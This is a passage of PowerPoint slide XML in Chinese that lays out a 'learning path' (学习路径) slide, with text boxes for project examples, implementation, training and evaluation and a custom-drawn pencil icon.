              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="73" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8551" y="6955"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实例</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="76" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="11344" y="6929"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
